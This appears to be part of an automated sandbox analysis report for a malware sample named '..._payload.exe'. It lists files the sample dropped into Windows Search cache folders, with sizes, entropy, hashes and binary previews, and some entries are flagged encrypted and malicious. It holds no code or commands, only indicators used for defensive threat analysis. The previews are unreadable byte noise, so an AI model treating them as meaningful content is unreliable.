                                                                                                                          Preview:{.".T.\w..!LU...Z\...4I4.(.....!..=.....mZ.aa;#`.7..(t..........[.....F>.)O.....$g\.m0. ....xM1..`....u....e........Q...w.L.+3....`.>.........;.y..*...d^....*;&).Lo.(.T'.j....|=.L.....".wA..3m..-.d..&.@..*.L.P&....9.......d......y%.o.......w.+...k8.%@.-W..q..9.......0.&..&.C..x...n.."W...o...W.$.-.R.....l..x.z...N.:..>._<.+...q..R..v)C.l..q.0.Yg....(........-...P.k.-..%@.I..U#.%...7./..].......e.+Gg.....MR.vG<.4E..&..s6..6..B5...C.......U.=MB.v.{.$&I.4p.F*...x....H\.......}w...S...h@..8.w.._.k...^O.[S.J....n).5:.W.|....y..W$4...P.ce.>.v.3.......f/.mK...@..e7..}i.p..P..%....e1.~`.O.....s..g.. 4..>+.@.3..s1...A..M.......x...6)BS.6g.W[...N..`.\Ty.SQr&xT...........7..N.#.A.0......2.B.......a.@.@L.!..G.Z..4.;..i.n=.aOk..t..i:...0.3ylF./J.C...H<C...0.&...(.e..&.....-.S+..9Z.C..G.(.,...jF...o..-Ay...<.n.u..x.....d....LB.z.6...2..wwr.r.7...%.7;..Q..T{...Q qw.VO...(.e..W.<.~;P.G........n...,e.U.p".6...;.E....!^...yQ9.....S..0..+%{....5...]

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1573198
                                                                                                                          Entropy (8bit):1.3187730986959796
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:ILcGQ0xBi6EaFCJRm+UjGK9/pSQLFjwQfyN2RDnPosRonubMguaPaL:qX+haUPKaUFmNwLPpRouta
                                                                                                                          MD5:5204AC226B42781202011234950D35BD
                                                                                                                          SHA1:0A3BD8C8D0BC4BEF2590277EEDC1A91D748686C8
                                                                                                                          SHA-256:5CE06B305901B1DE4F096DD55DD9B8C03C4695D5D7882A3BC8952ACEED86A256
                                                                                                                          SHA-512:E671A2BE11A16B154E529EE7F806159F9AA651192FEA80F395936B9FD0F57E3339C9F428C48C393045562A42BC975C4B8ED90D8C284F47F82923AD6E9DE35926
                                                                                                                          Malicious:false
                                                                                                                          Preview:./...q.{.$N..WB....".....!X.{e.T...B...t.t6.g...N.Z..?..|q.(.1...tu*.......)L.E.)M<..*<T.7.c..$W}.9..|..9<^x..[VH...U.I...%a...X.Ox....GN....Z..K....Ch..(.%.m.Dkk....i.!X.J.......`....Q..MS%1...2......<.....m|.r.X\#Q.[..[.........F..:0.[~...!.....16...G.n.;..}...@...%.X....H...M..N...>..D.....sg0....S.....R....(4|.7..!u.r...........W..2.>H.tP.........D.&.F..2.!.a....M._i.F...P.f..g.T..T8...:......x ..,.".!.t...6..hU.E......?u...h.Q....$j.;...._..+..+.......9.f.......q...3.,....d-.....3.`[......C..~....c.K...n..,....... x..W.TL...E.....?F!.E.L..".....ZlLET.e..'.V... Z.hP2U...Br..jf..}+..jZX8.4...)..C.F...*...H...|.R.BEM]<..UGjI&..[..K.R.~.^....E..o:q......OM..%.R.J._.;....q.D...g..L|J..I.!.u..~~...>.....h..+.9=RX...`....a..f...(.p...o.....Hj..^......s.....,../_....!.T.G.R.........lP..d7...|.+.:0.uw.....(z7...J..@k;.Y.Vl#...Y../-.....S..nlb7r.h..w.0.z.#S..h...J...\5yF.s....k..-K.G....95.N.E.........mc.J.AU.A[.HS.......z...Q.?{..X.9!.._..2

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.jfm

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):16718
                                                                                                                          Entropy (8bit):7.988276882485641
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:P/85PbIWY2lI/intubtmUzrmvuB67xUYPpLOGw:P/85PRlI/iAb4Uzy8m7PHw
                                                                                                                          MD5:14107D533E9F7BA4365366BBA864A728
                                                                                                                          SHA1:63226AFD033D851B1FF8EE3B1EA97C54E1B02C27
                                                                                                                          SHA-256:DCC8F76602F983F2395916978F856EB206212194785373268CE8252F874470F6
                                                                                                                          SHA-512:99765B07FCD995687D96DE360A4FAD8E194C6EF70F2B2B36F65EDC9FC80EB117BD3AA442B84D97E56A64DF2358EC946F14DABC6675FED074EBF538F6B5A3C66E
                                                                                                                          Malicious:false
                                                                                                                          Preview:@.v....HP...p..l...d.5..-3...VX.....#:A..(.l`b.O....B..!.......h8..s`.n..J..zO.L..]T.^.4.7J0}...u...\.*\.?D.#.v..F.....W..*.<.....?..'..#.$..j....[.9......Cu. .8G'HG.....5..g.v......3<.I....|.<B.....!.Y...E.k..c/3...%J........I....17C....'......V...{I.{,...].2y,.Y.....>!2.l=]'..Q'..N.G....=(+.....h.=.E..3_.$2.4.='.A.xs.H.m..x....+........Q.5JvWe.e...M.......X..a.9..ZM.A.hj......E:TM..=.}=....q*...V.N>.j........T.D|v..L......F..E..;T=..G..L.bEoX..}.\=.\}.....M.=...R#.Uh....9.%*._}....W...G...3....7$M.A'.Q..V.".e,..._...........GH..."..-.4,m .}{.tn.A.@I....46.y../u./../... %..qfm..%!.d.M......Ic.Ja9o...J....6.u..>V..\.6..c..q../.(*.r..=.....bL......2@.K..|L|W.t.-..:.......yC3S.(..U.W.NRZy....%:..........$....)k.M%U..-.... |2.."`.>.:..m]{e_.{}]..0....@.._._6E.j..r...2.)..g.-.~9.Ag.!......G&..2.=..7.^.2._=.^7|..v.v3.*J.GA$s.g...A0u.DC.m).......lS...p5R._...V......>.,..p.......7.f....C~?>..m..c..B*.m..C.2cpk....+#.{....].j.rm...Z\.v.|@r.Y.tSKV...."...

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2097486
                                                                                                                          Entropy (8bit):1.113263533475912
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:Q4NlllgQOAMYoYUCRrZakZr8zE6iaCOTq7sx:RllgQOcjUCVnl8g6GO2a
                                                                                                                          MD5:FA4CFCD5F2CCA3013CA1AE05ED093DDC
                                                                                                                          SHA1:B00ECBB09D97C5FB5BBA90078B912A5C70B3F9AE
                                                                                                                          SHA-256:0659B420383020915C2B4CB26D020CFCF52F88262D4AD6110A7BE926DDB68663
                                                                                                                          SHA-512:FB95D946548E5F05E53833FB132759D12D2AA095544E1DE408FF526A24484D37EF6F1AEE39A0A1B18B199B77077CAA3815347789FDC10257DBB4AA1CAF99DED6
                                                                                                                          Malicious:false
                                                                                                                          Preview:......+<*.p..*..8...)`86.m..3v..G.jI.+....o.L0..r.y.......J.w....r#..uq..l:...8l....;o.&Dd{./.S!m...g.f4...%F...~...v.!.U...HcbvLNp......k......y.z.a..m....(.X.{..%*x...D.0.4....^.@.....6.4.../.....jh....|;.Z.3..3A.h@.]...T..q..)N..k(..[..}X...T..\.aa>"^r;Hm....:pm...o....z]*......a.>..d.?..>0.lC5...,......>.(Pg~.A.{X.\.8..5Ia.t&P..-X.k$..1..3.D.gf.a%q.b..z(.........A..A.G&~....R.jv..H..2.R..f.p.3,...q.f.%8.|r.&...F...H......g....y.uSX#..l.@'_XQm.@2_...~.M}...L....8...+h"..$..[.)....^....e....i*@..[..r.}[9..Kh...c......[...w...0v`j&Km.!......@gL#.t....."Zt...9..8..pP..rZK...o.sX.m.1..^....;.Qp..n.p..g....("..I... .f-..u'.~. .k]X.Y..-..;......Cz....m...P.[z.,.....N..o...WO1@E.5.6`.L..:..#...^...8.E.........uE.....~. .....*\....!..N.....c..L.....e.v.Xs....*^F...%*....o.l..x.'U..[]......T.).!(.BP.+....JZ..Z....+...l.D9>.!...^.Lx.f(.[.-.*=....W...^......!.D..AU.D..5.{^.b71&[...7\.."T..)....eV.......Z1..|3..Z....u.tS9.S.9=.O....@...pS).^p.?...

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.jfm

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):16718
                                                                                                                          Entropy (8bit):7.989449069330687
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:PLIJSw0IH/tCR3yNt1K2mWYS4ea1PDvS9gO:8gXIH/t9t1KhRJeeDvzO
                                                                                                                          MD5:10A035557BCD936064D8444079F8E21C
                                                                                                                          SHA1:1B32B266B4BB6A6590A4FD72B6C5AD3272217D3A
                                                                                                                          SHA-256:46524857A6ED2FBD8A4FA185430342EE058E1311A9D52EE49B75B78D5BD4BCB0
                                                                                                                          SHA-512:7983A2DFA5917A46F431133557DBD4FC2A37FF6A776D95ABAD72FC56308AAB448895B5B9068721CD7E71BE6208B3F26744EE2015FC8FC7C0DD553AED99DDFE70
                                                                                                                          Malicious:false
                                                                                                                          Preview:..l...>.e=4P.}.........O...f.m....@..G...'..e..7V>..'..6.a?..=]..O.'u4..S.?..K..=y!.;..o..b*o....o(.>.E0d.....XE...6.9,L..e.O.7.......U7&+.5}.....gHJ.1.c%.c.........r2..y....*.Y.....c..>......9Uy.C]}J>...J..#...YCNU..~.".b..YX..t.....$.G..A-k.....r.....s...>F..?CI....1..2.-T..#]0...3!.qHZ.?f#..Y`....m.o8.m...v.)I.*V/.Wp...K.d=.VL.*..7.>....M8....\..G...n.D.*.7....r..HJ.tB..r+Em.[.~.......;............F.A....9.U.uQ9|I.CV.x.......6..h6.>./.8..i.:.)......o.j.....8wE.X.!.U.A^.i.......*=L...I./U..$..61xG.u2....g&...Z....0.e.._..8..t..........W..VR'..]p....j.|j..Q.,.J.W....5.n .=d..p......Zt......7._.+|...r...L9..4Qt..&h,M...T7....*......;...69Y_9..$^..WP.......Vm.......<.kt;A(.V...,...+ia.q!.|~pR..?#..2..A.. .>.P.1..;.R.#.H}....EU.?.....e......C[.V..T.H)?....".f...*|...d.=>.9..M.....l..L..l.."..f.....L?h..0.U.Yc..#...eDe.P}.......*.0.F2.........N..NH...a...+.~..-:V.T.....:.A?..P..h..."..+............r.q.../}[1.6....y42..;N.&.D.]gu..&d?._..[..K46.

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\edb.chk

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8526
                                                                                                                          Entropy (8bit):7.97741021143124
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:E4dP26xc1uxOsaCTn22v6EIqAcOUz0vm5wG7B26gnu:EQPPgq3/n+EIqAcOUzmmFB26gu
                                                                                                                          MD5:D5C37AB1BD721291829918C292D925B6
                                                                                                                          SHA1:4BF8EBC271FF9B45A2B3E65CB5A78144BAD0DEA5
                                                                                                                          SHA-256:598F93BED0A37039849B140CCECB008EA1D8517ABBB959F3213E56D5764C3DC0
                                                                                                                          SHA-512:B20DCD6E672438E59A627DA4B7F40750CAEA61F187CA8E97A140F9179843E8EF6EEF4B50C415974498284DF73D2F3E6A6EA73249675B79C1F68D5941395B1874
                                                                                                                          Malicious:false
                                                                                                                          Preview:6.....G.+^..^.tJ\6..1.K....RB.....&..+.&4...u..P..4R.....Z<.hWp.Q......,..Rp.4JvMW.\..6..o;&......i.I./.{x.D......?.r|0 ..&...>.,sL..B..z...x.4..7M..r:...sS..h....Hg.T<..g...AP.}...w..&.+.3....&..,.@...lM..>...n.3m.l.Lx...;bg\h7...n.'..H..^<...;..)..R*...._<......U...G-sr....)A..O.c...[.1...5&w....p...f&e|...:g2.#32..g..#....xi{...=.R...*..:.Y..yU..8.7...]{R...Z._..#.u..v..".....7{...7....n.........d...{.Z..v`.....z.f.j.\.nb..."..r...J...._.i.{}....3...6Z...E...q.l@..%Q..-O.Z..+..PAKj8j.*.C.....w$A+..:...|..PQ.?..U.Zq nn.V).2z....8...._o..M...!m..:3dG...h<,v*Nx.p.hf....5 -...w..$o.g^......rd...n......vp.L...{............M.}..H">.['...d.q/...{...AI.....>..S.Z.X....._...*.]y....S....QL...2..]..tI...ZLI.'B......mvo,f.$....>L'..x..O.!..'b?.(..*.R{db..<....K.'T.nCc.'...eT....i...p.i...@1...S.A.9.4.~N...S.p._z...S..m...{.T.......a.4D.Z.{.:....m.E..........k..I e..H....N..*G.w..._W.k...N.Ma`H.$0s{~..c`5....a.jt......=@......2...;...%.Ts.|...H...

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\edb.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):524622
                                                                                                                          Entropy (8bit):3.208088251857312
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:ptUw1Dh4eZ9TvKWrGMXDmEnsKe4e9mitD4lGwskVuTVr380dK7noi7sRu:HXhr9eWrldsHdm+DfwsrZoo2eu
                                                                                                                          MD5:F6A940673633542075B0CFD26B830D02
                                                                                                                          SHA1:2676C1CD454C44B8AFF6C39B2A6F129ECE874DBF
                                                                                                                          SHA-256:A45B5297E550C0391C11E43AC6AD15BEF3BF5B732AA264BA34C656732338CDFF
                                                                                                                          SHA-512:65B4975BAA8BE75070961FE90F2C05C43721BEE1DC46CED844592D3EB49C775CCFA7C9108B02E9CF2F6726304F3FACA96C3DFCA41719BBE50297C414C3119144
                                                                                                                          Malicious:false
                                                                                                                          Preview:u.,I.n..V..(.~>E_.G.....[..AjL...Y...Jo..B.w.!..8mB.O.h.V.....L.*..;..^.zV...j.1....S .y.C*..N..{vL....s*,.kNB...?w.{T.h..GS?.1|S..1.v........t..I...... k.O..d.{..y...&..hc._{.....(.....h.Q\..ys`..vf..?um.. ..Y..v:.g.~_.......9.[.hw..{. ...%.Sr7.C.8;..........X.:.#...,...../.8....`.....gf...5..=c.7.+..Y.c.=p...2.......X.Rl,..j.K.T4.x./...W.].w...z]mb.."....]...H.NFg."[....[.3....."%W.T.&C..I....<.l....P.....FsM.....F...'...Z.f-g...>b...yJ.......b...J....FQ....c.c.....0..p6@S;....dW......@..;'=.}.e......._e....Zw.."a.h.5k....j.1.....4..L&cL..J6I......V....Uk...Ekc.j.lr.F.y3....O.w.i.Z.*.......^....G9....4..kI..^M.!...~cJ,1._..NZB.G...r..K.uA......A)..$b...[{...F..*.f.....i...yy..C)....a^........P>*i....i..V.B.....^.&..l..e.S.q..<>.=O<y.nx..i.XT/.....B:]j.........t..<?i......1.....&..V..9#K}3...O%tKJ5?.r.J.c.)...=V..^]F../h{.*..m.....[......[..Ba*C...p.fX.L.9/u....#..Y..I....oz...z......~q...br.....soK.yv.i}ed..1.{...ZP.....T......C.y.

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\edb00001.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):524622
                                                                                                                          Entropy (8bit):3.50240189800457
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:M07uyCgLLbrt9LSHitipBUuL1id2SleYtL1GaBWqUB68aNcmul34U:M0SyCQLbrt9uCopBDLL6NG4BUBx
                                                                                                                          MD5:5EE08DA6D05807B3732AD2C09E76539E
                                                                                                                          SHA1:BA357CBE623691CD6752638B45D8E9590DEAF22B
                                                                                                                          SHA-256:9C39284CFE11603E19EF2D721F8052DDD74C064CF3C7B2A882DB62BC80AC4446
                                                                                                                          SHA-512:AD0045497D09E5D52708566E51C90CC6F8DDA0052883C521AF76E0858DDBAA29AFC52D14E61336C8523A60DD151FE37B6DEEB33FBFC9C9D1FCB99385C94698F3
                                                                                                                          Malicious:false
                                                                                                                          Preview:......Ji.H7O........MH... .5_..%.),.Z..u..e..].QfS+....0.i74+...........1(...\...=...o.3..N6^;..(8...?.uqZ...6.:..O.,.Kf.4..L.J..s....I.`....KuN...=./.R..&.t.l.....cr./._L..N.%.LtO.7.Q.#-.(.m.J*.^..-.<...H...~...D...Rk..Z.g.S...?.z.c....n>....^....d..w.E..){..n\C...m.*Z.^.)....+|m......{F.5....#..(.?..C...A:.^%.)3.m.)....z.2'Pi..r... U.${...X......n....+......2m.F...........2...]....[.B....\...:..@.yeIT8n..+..+..(.qM.2.A.0"../8...c.k...2.^29.>...(@.....#'.rE......]..a.O.<...........!b...^..Cx9r.2db\......n"...E...].,.dq...A.......g.wL.C@.6...>...U....%qMm.|o..yMt.@q.e.aG.. ,..@..&6..].....~.U`........Y...8.=..*=t.....%..9.HuRX.y.#...".i......h.?.}..b....9$Bj.7;..r.`u.....19{..8.UIV.]..K......)...7N..J.....V..yD..IG8.t.K........="..0B......=....x6qY.&;.....y...28M.....R.....>..m..G.a.a...K...8qh.I{.R..X.W..Z.Ah.{...1SB.M]=...f...89.4....V..?5.....V.,...Y.).!.E.}RU........n\7....~g.u....lH1t~.s..<......{V..c..........#%F.?....u..........)

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\edbres00001.jrs

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):524622
                                                                                                                          Entropy (8bit):3.207992607581676
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:elqrIaDGWHbQn08uHBsoCKAlXQeWUD1Tm4JT8kqyahF/Qk8biFjDLMwNr6pka9Y:eorBD+n4A7Y4lqy8tGbiFjPzNOka9Y
                                                                                                                          MD5:CC4C711599874ED330B2FC6FD2A63728
                                                                                                                          SHA1:AE9DF9A8BEBA53C0318B37D84C991B5BD11B13A7
                                                                                                                          SHA-256:4C801EEF9D8481FFE2BC64665753978FDE2F684C8898BBF3DCF2BD71F49A529C
                                                                                                                          SHA-512:41407EFC4EAED1AE426D2955EC2929A4F2893732E09C13B46247D308862B4081B095CF1ADA37D0C85E36751B5560BA6FC6ACEC2CCF09AD6E0676BFBA5A5CFB7A
                                                                                                                          Malicious:false
                                                                                                                          Preview:......o{..K..gL...XzE......I..Yj.A....2....a.r..V[....D~}.:.8...F...B1.e"..k.3.t..u.9_(.C-..sa&.~.(.6..w.k....2..!V.].5.p..A.N...a.L'.O...]..l.>....\Mp.Q1e.-..b.T....Lt.....u..8.O.....`.b...v.2.<.8\.'v.563'2e.......q....\...L...:..:......"..>...EM..*..(.wX.+...../..3.<..*..a.U.Q....W.@....|.D.b..KLK.=....5.^.../ .. v...r4q...-.1.yb.=S..aY..CJ..!g......*...x..k.\..fbk.'..h.f$..$...9.N...h...8...8..a]....a....o.\b.)..&.......z.....8..B.'....T..^.......2...k7....%.S....v....}..._d....4/w..f..p.....b*u.$H'.;....V.lo.F:.UW.e.....[..N.d...>.U.2...+...M...l.O.......L>.<q.g$...?.yBs.Dg..Tz....x....;..M".....M.M....*0.V.R5..{.(.....W...<.-..S..&..lo....t..6.f..X...J..{u.q-..V1..........?.|.!....lU.*.8.e....[...;.b"..[..#.}.1..&Ua/pZ...TP....L9x..n...KJ..B.#\k..i..d.$<....Z....pw.X.(.G9..64/....HK..bPW...V.s.e...tu.......v.r..+...N%g...9....j`.....Z.&....Z\MS..@L.l.>=.....%n..<T.".*../6.o..H5. ......r.S.\.Z9..w.....:.k?U.Q....N2...ef........

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\edbres00002.jrs

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):524622
                                                                                                                          Entropy (8bit):3.2083877653908286
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:nbJNlZx6PE4pRX/SeLoPbPS4UWubkN2BW2Qh+X/bsXh7fOaZURJtDjOEkQ4jt:nFNzuE4pTLor5m8ao+PbshKaaRJtPOEo
                                                                                                                          MD5:1D184B2AD37F798E7316BFE6053A76D6
                                                                                                                          SHA1:B3138467116E16A199F3F01EA4C19609942FC36A
                                                                                                                          SHA-256:EEBF1A3B59F7E8128F4327B0695092DCBA90F9FE46A3BB0A8D41512FD50F4C43
                                                                                                                          SHA-512:6068D8904F311048B318214941D1366ED973C3506CFB784129857F05703BAE8AAA8F00F08DEE7E082E8645BFE70DC76276925BF221ABAEE191A264B2E7D25691
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......m.....P...n...gU"..O.[.5.v..E.l[.).q..]W...'....b....1...S.......x9._.".o....)....Q ..Q.B.n.$-.>.'(.G..........rG.j.r.y...:Q..k,.....L..d.F.......Y._...N.|.W{..u....~....n....>Y.:..N-.?.9..+......N..1.!..!./:._e../D&..7m.x..#..s.[T.h+.q./>.MW.6".PZ.*...U._.+[.9M./.`!....1X(...*....j.0...AQ._..s)....v...E`.h....B........F.4-....L...%.....b.I..V..j..8K..."...s...c.U'..G...Vx.........sA...Gj.Zv...~.....8........B..m.....R.X|M.".B.....aD.L.....d7.l..I.........h..i..c...V<...V....G#.+\.....V..%k.f.D&....rYN/..~.....0Y.E.}....;./.....\E......"...#...$../...:.y.:.u.J.<h.b..B..n..B..7...l.b.n..V..[#B[...e+.l).V8\R...x.e9.ou_.!L...wP!......e..3.'.X.....<..E..f.NPZ.T......s7SU......3...%....V.gu..#.].........pmNe=..{1;.s^l.~j....f.u....5|..4.=..~.U...b.y..|....+V{Ku.q.v.}.%...FL.6.3..G..9g..b.X.ZC...@o.v).1O..{...a..0.A...%..a+6...0J3eD.[>.....;Ri.%{|t..k.vQ....l.W.....C4..<(.........Z\..#..-..4......*.w.Y.p*g...R+P...oc#.b..V:(.......f.X.n...i

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\edbtmp.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):524622
                                                                                                                          Entropy (8bit):3.2080603388212166
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:TvuyAMN1r+wPHUjvXgYTH1fJbOIiofzBhhff9vTm0HgUPdq:Tv7jN1r+w8bHzx1DiofzBnfVi0HG
                                                                                                                          MD5:DCA3E220F219917B3E3F3526A9771C14
                                                                                                                          SHA1:FEB212F237A57D8B35EE10DE0B0C32039E35B870
                                                                                                                          SHA-256:D82BD9D5031FC30F2B8ED9288E9A6F00C6342D8A18D26250535AA031CD5D56D6
                                                                                                                          SHA-512:CD19C927B40261A91C4F42178CC9BE9F82A9DA261B89EAAE4936D5495811FB3670B295AF58DC356F473E96E53A2E0079F9154E814706CD00C60F88D014B4214B
                                                                                                                          Malicious:false
                                                                                                                          Preview:.....f..R.*..X...?...H.....q5.b..TX.6.B.pk.3o;.(l...7Gc....\6...I.\..yz..M..Nj.......3..p..4Y...._\....$'.......f-.....oiC...`D.9.|V..B..........uv~.a..E.."A...:1:..>#>..... .C.E....9B.[....H...L.9....K....R...Z...E...umJ.B3....r.}.....^."|.-8.7P.g...d..........w.Q...#.....H.}<.)..d...h.o....!..%........Gud....s.>..g^...nq..C...L..RV.7.C..A............z5...#V.M6..s....]v..l*T...x...>.wp...Z./c.{..K.)p..a...%3..:N.6u.me.(.,.....U.....RN.o...f...f.....M.b...|.=_...@...XA..-...W-."]k..J.X.@..VJ...^.Oy..;8f.j.(.1......R.H*.)..F.y..T./..#f^;......+....04P..n.5......Z.......5W7Y..+!...j.......:e.D....i.<......K#...v(...cz..C...............]/0 ....d.^..a0.KE....<.....2....ym.."B..;.XT.T.....~.c.p..8.Nt4.|@.....+,......0......%..?....s.vc..`Q...q.cJ.Z...q.vB.K..?._..>.....f...AhF..m........=.mb?..hu...EGl.r. ..e#.....d.|...(....8fM^.?.....K`..l...;.L..t...f...M......j.+....e...<......;.z.n..[.."..Z[l)".....K..5c>.a.....e........7.....q..YN.......2

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903167889885.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):105937
                                                                                                                          Entropy (8bit):7.998346878949148
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:/gYtd5ni461K+bv6O0aSDr7m816owRDhX:owzu5L6177m26VRDhX
                                                                                                                          MD5:E954277B152F57FCADF78422E74CEB9B
                                                                                                                          SHA1:DD2BB840E3A0096BDA00493CBE4E57A68A7CBB05
                                                                                                                          SHA-256:638ED4A59DAD39B8EBBA2B8C7405B17967976F65435CE05EE5E5A879EB00A846
                                                                                                                          SHA-512:0A5B3230093D8EF09F3AD85B929D35F04F27C732FE92A59A32D62097867D3D86561CD178C91495281115252983D98BA9B9A8C3BBF53E3E42C9F4CCC2226447D0
                                                                                                                          Malicious:true
                                                                                                                          Preview:[{"Sy..31....-i.....'U......|..>...Re..u6B.|L.J...^A.U\!.../...._....:[.y.......Wd...!M.kr!GY....`D8.oA.&L%.......)...I..P.7.7'dx....L..._.Q.3..3.......H..e.O.C^.:.$..`r|............7?.b#.O.f.8.J..G.....[....<.8..HM..1..)/.....?q..ocaT|?..<...N.....!..>,L.1..f..#..G.....-q.':[..Kg...p..E....3(>@7C.#=o!.s...<PA.f.,I.8....N!...................Y.Kq.|.z.....(s..5..J.......K.../o..9KUpg4..w...$..p.U*.JV.....vjH.=C.e.>l.d.+.S.3?h.^.......E.B.#.k...3..m.j......6{.`....... .9.da..U...!...o....|.....=..5.s</Q.x}.5.K...G...nV...:..K.....f^.o_?..E:.....IX^.z.rr.>A.;..q... ......N)"...*(.\.A..(f.VJB..x.....D!r.9&h^.0.H..M.$V*.....G....p.f.Ks.S....`;...T.o $....b......`...<..,U..y..%..@..w....S.y...N..(..l..G.....+.izEw..........V!...U.B........W....SG6x........i)..OS....[....DAZp..?Gi.7.X...}.....l;..y:..Z..Y.+).>.0.&h*...)....Z.H...v....L.lq.Spm..?X.m.aNZ.<i.n..c...L...&.Cg.../^.......b...Ob.8.o....../".M8.-}.k,T...2...+]T.j|.#Z..C..D. ..>.j..

                                                                                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903214673664.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):105937
                                                                                                                          Entropy (8bit):7.9982952133489
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:VgDXUO4DfMA7Q7TxgPDzpCfOdsnJ9cXn8+u4zfH9yTA0L4Hj/K67L3FnO6HCTEwE:VsL463y1u9UM7LOKS3ZOxww85
                                                                                                                          MD5:5571257DD00B59035A95A858D6F742ED
                                                                                                                          SHA1:C1187F8938BA3ED29A41F190384171FFD0601A63
                                                                                                                          SHA-256:D768F574D389E635718B7D0F38A195B94A82DBA230AD9897936188CC429D428B
                                                                                                                          SHA-512:4833DF9F7664A1636C06E610D4F2A0764AA3ED6F8838E599DC043DBDA199EBFB5B8A955FC17F3F813E614FFB11B65E344D41610B2C7DA22FFE4D574215014BD8
                                                                                                                          Malicious:true
